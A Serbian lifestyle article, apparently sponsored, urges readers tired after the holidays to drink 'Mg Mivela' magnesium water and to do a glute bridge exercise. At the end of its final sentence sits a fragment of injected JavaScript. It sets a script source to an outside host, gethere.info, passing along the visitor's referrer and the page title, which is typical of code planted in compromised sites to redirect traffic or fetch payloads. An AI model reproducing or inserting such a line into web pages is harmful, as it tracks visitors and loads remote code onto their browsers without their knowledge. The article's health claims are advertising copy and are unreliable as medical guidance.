KAKO SE VRATITI U FORMU: Ako ste umorni nakon praznika, magnezijum će vas „vratiti u život“

KAKO SE VRATITI U FORMU: Ako ste umorni nakon praznika, magnezijum će vas „vratiti u život“


 

Praznici su prošli, a stigli kilogrami i umor. Naime, u vreme povećane konzumacije visoko kalorične hrane, u našem telu znatno se smanjuje količina magnezijuma i potreban nam je dodatan unos ovog minerala kako bismo se vratili u normalu i sačuvali svoje zdravlje.

Da bi uspostavili balans u organizmu tokom zimskih dana, pored redovnog unosa vitamina i minerala, važno je baviti se i fizičkom aktivnošću. Zato vam savetujemo da počnete sa vežbanjem i svakodnevnim konzumiranjem 1l Mg Mivela vode bogate magnezijumom koji doprinosi normalnoj funkciji mišića, smanjenju umora i normalnom funkcionisanju nervnog sistema.

Kako da se naterate da vežbate?

Jedna nova vežba dnevno biće dovoljna.

„Postepeno i dugoročno bavljenje svojim telom je pravi put koji stvara dobre navike i još bolje rezultate! Ukoliko svaki dan uradite jednu novu vežbu, bliže ste ostvarenju cilja.“, istakla je Tamara Ratković, profesor kineziologije sporta.

Vežba “Glute bridge”: Lezite na pod, podignite kukove i ispružite jednu nogu. Čvrstih leđa, zategnutog stomaka i kukova u ravni, spuštajte gluteus skoro do poda, pa nazad dok kukovi ne budu u ravni. Vežbu uradite 3 puta, po 10 ponavljanja na svakoj nozi.

Bila zima ili leto, briga o zdravlju ne sme izostati. Hranite se zdravo, bavite se fizičkom aktivnošću, a za brži oporavak nakon fizičkog napora ili stresa, tu je Mg Mivela.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar